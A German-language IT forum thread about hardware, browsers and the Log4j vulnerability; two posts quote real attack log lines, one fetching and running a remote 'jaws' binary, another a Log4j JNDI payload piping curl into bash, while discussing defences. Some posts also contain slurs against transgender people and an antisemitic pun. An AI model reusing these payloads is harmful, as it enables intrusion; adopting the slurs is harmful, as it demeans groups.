Menü×

Der IT-Thread

  • Mod/RDW
    #241 BSKartoffel 8 Dez. 2021, 09:48

    Moin suche aktuell ne neue Tastatur und schwanke zwischen den drei Corsair Tastaturen K70, K95 und K100.
    Hat jemand eine von denen oder kann ne gute empfehlen?
    Anforderungen:
    - Kabelgebunden
    - RGB
    - Anti Ghosting
    - keine lauten klappernden Tasten (leise Tastenanschläge)
    - Weiche Handballenauflage
    - Multifunktionstasten/Programmierbare Tasten wären nice muss aber net

  • Mod/RDW
    #242 ProfHase 8 Dez. 2021, 15:44

    RGB ist richtig und wichtig

  • Mod/RDW
    #243 Sylvester 8 Dez. 2021, 16:08

    Zitat von: ProfHase

    RGB ist richtig und wichtig
    wenn man einzelne Tasten farbig beleuchten könnte fände ich das schon geil. Aber sonst ist es überflüssiger Nonsense.

  • #244 hdnslt 8 Dez. 2021, 16:45

    Zitat von: ProfHase

    Was kann man denn als 4K Referenz nehmen? Hab einen 4K TV und ein Notebook (sogar ein Markennotbook) als Media-PC
    Wie meinen?

    Zitat von: BSKartoffel
    Hast du mp4 Dateien in 4K oder willst du Netflix und Co. guckne?
    Hauptsächlich Streaming über Universalanbieterseiten. Netflix und co. wenn dann über Brauser.

  • Mod/RDW
    #245 BSKartoffel 8 Dez. 2021, 17:14

    Zitat von: hdnslt

    Wie meinen?


    Hauptsächlich Streaming über Universalanbieterseiten. Netflix und co. wenn dann über Brauser.
    Keine Spielekonsole? Kannste da drüber machen. Ansonsten würde ich n Fernsehr kaufen der das direkt integriert hat. Beste wo gibt. Kosten doch auch nix mehr die Dinger.

  • #246 hdnslt 8 Dez. 2021, 18:35

    Son Android Dings hat mein TV integriert, will ich aber nicht benutzen. Ich brauch ein echtes Betriebssystem mit nem gescheiten Browser, wo ich meine Skripte, VPN etc. laufen lassen kann.
    Hatte an sowas wie ein NUC gedacht, aber die sind mir zu teuer.

  • Mod/RDW
    #247 BSKartoffel 8 Dez. 2021, 19:48

    Zitat von: hdnslt

    Son Android Dings hat mein TV integriert, will ich aber nicht benutzen. Ich brauch ein echtes Betriebssystem mit nem gescheiten Browser, wo ich meine Skripte, VPN etc. laufen lassen kann.
    Hatte an sowas wie ein NUC gedacht, aber die sind mir zu teuer.
    Kauf dir n NAS

  • #248 Gelöschtes Mitglied 7 8 Dez. 2021, 19:55

    Mein PC startet nicht mehr. Auf dem Startbildschirm sind vertikale Streifen zu sehen. Ist die Grafikkarte defekt?

  • #249 Dunklehorsteus 8 Dez. 2021, 20:00

    Zitat von: Krapfen

    Mein PC startet nicht mehr. Auf dem Startbildschirm sind vertikale Streifen zu sehen. Ist die Grafikkarte defekt?
    Sieht es so ähnlich aus?

    0_full.jpg


    Falls ja, einfach Lüfter von Staub befreien, dann rennt die Kiste wieder.

  • Mod/RDW
    #250 Sylvester 8 Dez. 2021, 20:15

    Zitat von: Krapfen

    Mein PC startet nicht mehr. Auf dem Startbildschirm sind vertikale Streifen zu sehen. Ist die Grafikkarte defekt?
    oder der Stecker zum Monitor steckt nicht richtig.

  • #251 Gelöschtes Mitglied 7 8 Dez. 2021, 21:31

    Habe nun alles sauber gemacht und neu angesteckt. Auf dem Bild steht "automatische Reperatur wird vorbereitet". Im BIOS steht irgendwas das der "Grafik Controller disabled" ist.

    IMG_20211208_213442.jpg

  • #252 pump3 9 Dez. 2021, 01:30

    Zitat von: Hexley

    aab.png


    Hab ich zwar schon in einem anderen Thread gepostet, aber fand das sehr interessant. Quizfrage: Ab wann oder bis wann ist eine Programmiersprache eine "Soylanguage"?
    Bei Haskell und Lisp würde ich sogar zustimmen, dass das Sprachen für Sojabuben sind um sich wichtig zu machen. Haskell ist eine akademische Lehrsprache die für echte Zwecke unbrauchbar ist, und Lisp hat seine besten Zeiten längst hinter sich.
    Bei Rust ist es gerade so an der Kante. Die Sprache wird inzwischen sogar im Linuxkernel (experimenteller Status) genutzt.
    Python passt meiner Meinung nach nicht mehr dazu, da diese inzwischen sehr weit verbreitet ist und ihren Zweck erfüllt. Klar ist sie ultralangsam, und mit C oder C++ würde das Programm vermutlich 100x so schnell laufen. Aber sehr oft ist man darauf ja sowieso nicht angewiesen, und man kann zeitkritische Teile ja auch in C oder C++ schreiben und sie aus Python aufrufen.

    Ansonsten fallen mir als Soylanguage noch folgende Sprachen ein:
    • Ruby: Musste ich selbst mal im Studium programmieren wegen Ruby on Rails. Ich hasse diese Sprache. Ohne Rails interessiert sich fast kein Schwein für dieses Zeug
    • Go: Ich hab sie selber mal ausprobiert, aber als ich dann die geschweifte Klammer { in die nächste Zeile machte, hat es auf einmal nicht mehr kompiliert. Seitdem nie wieder angefasst. Absolutes Kommunistenmachwerk, kommt ja auch von Google.
    Haskell ist auf gar keinen Fall eine soysprache. Und auch nicht nutzlos. Für compilerbau, datenanalyse, verifikationen etc. einfach fantastisch. Ist auch zu "hoch" um eine soysprache zu sein.
    Lisp vlt. aber auch eher weniger. Lisp hat schon seit den 60ern seine besten Zeiten hinter sich, ziemlich erfolgreich sogar.
    Rust kann definitiv sein, Python vlt. auch. Auf jeden fall aber JS mit seinen myriarden von Frameworks die eins nutzloser sind als das nächste.
    Ruby wärs auch wenns noch jemand benutzen würde.

  • #253 Gelöschtes Mitglied 78 10 Dez. 2021, 18:30

    Zu der Sojasprachendiskussion: Da Programmiersprachen kein physisches Soja enthalten können, sind sie wohl genau dann Soja, wenn sie von Sojamenschen benutzt werden. Ich mag Python zwar sehr gerne, aber wenn ich irgendwo was darüber lese und dann Wörter wie "machine learning" auftauchen, dann fängt vor meinem geistigen Auge sofort der hier an zu tanzen.
    Lisp und Haskell sind wohl nicht mainstream genug um Soy zu sein. Von Rust habe ich null Ahnung, aber ich vernehme immer, dass es viel von Transsexuellen und SJWs benutzt wird, und damit ist es Soy.
    Die schlimmste Soysprache von allem ist aber nicht auf dem Bild, denn die ist Javascript.

    Und damit wären wir schon fast beim eigentlichen Thema:

    Googel ist im Begriff, in Chrome einen neuen Standard für Brausererweiterungen durchzudrücken und den alten zu deprecaten. Im neuen Standard fallen einige Möglichkeiten weg, die man braucht, um gewisse Ad-Blocker zu stricken. Mit dem neuen Standard werden Adblocker also verkrüppelt.
    Firefox hat angekündigt, den neuen Standard zwar zu übernehmen, den alten aber weiterhin zu unterstützen.

    Jetzt könnte man sagen: Wen interessiert's, wer Chrom benutzt, ist sowieso selber schuld. Aber das ist wohl zu kurz gedacht.
    Der normale Firefox ist schon längst keine Alternative mehr, schafft sich seit Jahren selbst ab und spioniert den Nutzer im Auslieferungszustand ebenfalls aus, und das wegzukonfigurieren ist sehr schwer. Wer sagt: Benutze Firefox anstatt Chrome, das ist besser für deine Privatsphäre - der macht sich lächerlich. Siehe hier und hier.
    Dass Firefox so den Bach runtergegangen ist, ist wirklich traurig, denn das beschädigt m.E. auch den Ruf der Freien Software. Schließlich ist Firefox wohl dasjeniche FOSS-Programm, was am meisten von Normies benutzt wurde.
    Statt Firefox ist es wohl schlauer, LibreWolf zu verwenden, der ist ein bereinigter Firefox. Unterstützt allerdings kein WebRTC und damit keine Videokonferenzen im Browser.
    €: lel ich sehe diese Problematik wird in den FAQs adressiert und man kann irgendwie an den Einstellungen schrauben und dann soll's angeblich doch gehen.

    Und mit der Änderung in Chrome fällt dann sowas wie unjewgled-chromium wohl hinten runter, die werden wohl keine Wahl haben und den neuen Standard mitgehen müssen, schätze ich. Die haben wohl kaum die Ressourcen, den alten dauerhaft mitzuschleppen.
    Dann gibt's ja noch den vielgelobten Brave-Browser mit eigener eingebauter Werbeblockertechnik, aber der ist auch etwas suspicious.

    Fazit: AllesManches ist scheiße.

    Dieser Beitrag wurde von Gelöschtes Mitglied 78 am 10.12.2021 18:38:42 bearbeitet.
  • Mod/RDW
    #254 Sylvester 10 Dez. 2021, 22:49

    Zitat von: ahaha_a_gnu

    Ich mag Python zwar sehr gerne, aber wenn ich irgendwo was darüber lese und dann Wörter wie "machine learning" auftauchen, dann fängt vor meinem geistigen Auge sofort der hier an zu tanzen.
    Der Witz ist, dass Python für Machine Learning kaum eine Rolle spielt, da die fundamentalen Bibliotheken (numpy, Tensorflow, ...) alle in C, C++ oder Fortran programmiert wurden, und eben ein Python Interface anbieten.

  • Mod/RDW
    #255 BSKartoffel 11 Dez. 2021, 10:19

    Zitat von: Hexley

    Der Witz ist, dass Python für Machine Learning kaum eine Rolle spielt, da die fundamentalen Bibliotheken (numpy, Tensorflow, ...) alle in C, C++ oder Fortran programmiert wurden, und eben ein Python Interface anbieten.
    Ein Unikollege setzt aktuell ein großes ML Projekt komplett in Python um.

  • #256 Gelöschtes Mitglied 78 13 Dez. 2021, 22:52

    Hallo. Ich nehme mal an, ihr habt alle schon von dieser Log4j-Nummer gehört. Da auf meinem Server überhaupt kein Java installiert ist, schätze mal, dass ich diesbezüglich safe bin. Habe auch schon sporadische Angriffe dieser Art in meinen Logfiles gefunden. Bin schon gespannt, wann das Botnetz was meinen Server minütlich penetriert auf diese Lücke umschult anstatt der ollen

    Code:
    185.147.16.236 - - [DATUM UHRZEIT] "GET /shell?cd+/tmp;rm+-rf+*;wget+205.185.119.11/jaws;sh+/tmp/jaws HTTP/1.1" 404 146 "-" "Hello, world"
    -Kamellen.

    Aber diese Geschichte maket mich trotzdem ein bisschen think.
    Da steht schon mal, was alles nicht hilft. Also Filtern ist schlecht (Quelle heise.de).
    Ich verwende bislang Fail2ban, um IP-Adressen, die Zugriffe abgeben, die verdächtige Wörter (wie z.B. wget) beinhalten zu bannen. Nicht um diese Angriffe zu unterbinden, sondern - so stelle ich mir das vor - um zukünftige Angriffe, die von der gleichen IP kommen aber sich möglicherweise auf andere Lücken beziehen, von vornherein auszuschließen.

    Haltet ihr das grundsätzlich für eine schlaue Vorgehensweise oder ist das eher domm? Damit sind bei mir jetzt ein paar Hundert IP-Adressen gebannt, aber die Botnetze die an die Tür klopfen sind ja erheblich größer, die kann ich niemals ganz bannen. Und Fail2ban basiert ja auf Python und regulären Ausdrücken, und wenn am Ende eine Sicherheitslücke in Pythons RE-Modul ist, dann ist mir meine Sicherheitsmaßnahme zum Verhängnis geworden. Außerdem verbaue ich mir damit die Option von irgendwelchen "Security Researchern" vorgewarnt zu werden, wenn die in meiner Fail2ban-Liste stehen.

    €: Ich werde jetzt jedenfalls alle 700 Kommentare im Heise Forum lesen, da lerne ich sicher viel über Sicherheit.

    Dieser Beitrag wurde von Gelöschtes Mitglied 78 am 13.12.2021 23:28:01 bearbeitet.
  • Mod/RDW
    #257 Sylvester 14 Dez. 2021, 00:29

    Ohne zu wissen, was du auf deinem Webserver für Dienste zugänglich machen willst, kann dir da wohl keiner sagen was richtig und was falsch ist. Wenn jetzt jemand auf deiner Seite nach "wget" sucht und dann ein http request ähnlich dem hier https://gelachtwird.net/index.php?search/2175/&q=wget&o=date absetzt, dann wird er wohl gebannt, oder?
    Ansonsten wäre Snort auch noch ein sehr mächtiges Werkzeug um auf Hägger zu reagieren. Kann man vielleicht mit fail2ban kombinieren.

  • #258 Messermann 14 Dez. 2021, 04:17

    Bei uns kamen die ersten Log4j-relatierten Anfragen bereits ab Freitag Nachmittag rein:

    Code:
    default-vhost_access.log.3.gz:45.155.205.X - - [10/Dec/2021:14:34:33 +0100] [IP] "GET / HTTP/1.1" 200 364 "-" "${jndi:ldap://45.155.205.X:12344/Basic/Command/Base64/XXX}"

    Der Base64-encoded String war dann nochmal

    Code:
    (curl -s 45.155.205.X:5874/[IP]:80||wget -q -O- 45.155.205.X:5874/[IP]:80)|bash

    Da die typischerweise ja nur IPs durchscannen ist das alles brav im Default-Vhost des Webservers gelandet in welchem keine Dienste laufen.
    Der Exploit-Code hier war im User-Agent Headerfield.

    Ich kenne die Funktionsweise von fail2ban jetzt nicht im Detail. Mein Verständnis war dass es z.B. SSH-Logins blockt wenn von einem Host mehrere fehlgeschlagene Loginversuche kamen. Diese Funktionsweise bringt hier natürlich Null, da der relevante Exploit-Code erst nach einigen Versuchen bemerkt und blockiert werden würde, was natürlich bereits zu spät wäre.
    Rein prinzipiell wäre filtern hier aber gar nicht falsch (zumindest als erste Akutmassnahme), es müsste aber natürlich bereits auf Paket-Ebene erfolgen damit eine entsprechende Anfrage erst gar nicht an die verwundbare Anwendung durchkommt. Das wäre aber vermutlich wohl eher was für das von @Hexley erwähnte Snort.
    Edit: gerade erst gesehen dass der Heise-Artikel schon ein Nachfolgeartikel ist. Ja klar, Das Filtern ist natürlich keine Dauerlösung da der Code natürlich beliebig obfuscated werden kann.

    Erst mal prüfen ob man überhaupt betroffen ist. Ist ja Java-Library - wenn du keine Anwendung im Einsatz hast die auf Java basiert ist alles im grünen Bereich.
    Allerdings nur weil Systemseitig kein Java installiert ist heisst noch lange nicht dass du keine Java-Anwendung verwendest. Viele Dienste und Pakete haben ja einfach ein JRE oder JDK selbst dabei.
    IMHO sollte man an dieser Stelle natürlich selbst soweit aufgestellt sein um zu wissen welchen Sachen man im Einsatz hat (die in irgend einer weise öffentlich erreichbar sind) und diese jeweils zu prüfen.

    Die simpelste Variante ist einfach mal per
    Code:
    locate log4j
    zu schauen ob und wo man die Lib hat.

    Falls vorhanden im zweiten Turn prüfen ob die jew. Version und eigenes Setup betroffen ist:

    Version 1.x ist z.B. nur bei Verwendung des "JMSAppender" in der Config betroffen
    Ein Workaround für Versionen 2.x steht ja im Artikel.

    Führt halt am Ende kein Weg daran vorbei deine eigene Umgebung individuell zu prüfen und das individuelle Risiko abzuschätzen welches entgegen der Hysterie-Meldungen ziemlich unterschiedlich ausfallen kann.

    Hab bei uns zwischen Freitag und Montag alles geprüft mit folgenden Ergebnissen:

    - Anwendung verwendet Log4j aber wegen Version/Konfiguration nicht betroffen
    - Anwendung verwendet kein Log4j
    - 2 eigene Komponenten betroffen - Log4j Lib von Kollegen getauscht
    - 2 eigene Komponenten nicht betroffen

    Easy peasy

  • Mod/RDW
    #259 BSKartoffel 14 Dez. 2021, 09:36

    Freu mich schon :rolleyes: wir können dann wieder zu den Unternehmen rausfahren die es nicht auf die Kette gekriegt haben ihre Systeme zu sichern und Schadensbegrenzung betreiben...

  • #260 pump3 14 Dez. 2021, 12:31

    Ersetzt doch den ganzen Java Müll mit Haskell, da hat man das Problem nicht

LSMaxx